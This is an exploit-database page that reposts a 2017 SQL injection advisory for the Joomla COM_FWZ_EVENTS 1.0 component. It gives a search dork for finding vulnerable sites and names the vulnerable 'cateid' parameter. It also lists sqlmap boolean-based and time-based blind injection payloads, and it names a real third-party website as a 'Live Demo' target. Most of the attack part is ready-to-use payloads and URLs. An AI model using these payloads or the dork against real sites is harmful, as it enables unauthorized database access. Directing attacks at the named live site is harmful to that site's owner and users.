Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Exploit Alert | High | Remote | 2017-06-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
Joomla COM_FWZ_EVENTS 1.0 SQL injection Vulnerability +----------------------------- +|R|A|M|A|D|A|N|K|A|R|I|M +--> +----------------------------- / Exploit Title : Joomla COM_FWZ_EVENTS 1.0 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_fwz_events # version : 1.0 # Tested on: [Ubuntu 17.04] # MyBlog : http://xbadgirl21.blogspot.com # Date: 11-06-2017 # video Proof : https://youtu.be/tJ6jnMlcBsc \ To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz +----------------------------- ###################### /|X|B|A|D|G|I|R|L|2|1|/ ###################### | [+] PoC : | +##################### | [cateid] Get Parameter Vulnerable To SQLi + http://127.0.0.1/index.php?option=com_fwz_events&view=event&cateid=2&Itemid=120&published_date=2016-02-28&id_item=140 +##################### | [+] SQLmap PoC: +##################### | Parameter: cateid (GET) | Type: boolean-based blind | Title: AND boolean-based blind - WHERE or HAVING clause | Payload: option=com_fwz_events&view=event&cateid=2 AND 6849=6849&Itemid=120&published_date=2016-02-28&id_item=140 | | Type: AND/OR time-based blind | Title: MySQL >= 5.0.12 AND time-based blind | Payload: option=com_fwz_events&view=event&cateid=2 AND SLEEP(5)&Itemid=120&published_date=2016-02-28&id_item=140 +-- ##################### / [!] Live Demo : / ##################### + http://www.pow.com.sg/index.php?option=com_fwz_events&view=event&cateid=2&Itemid=120&published_date=2016-02-28&id_item=140 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers #####################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.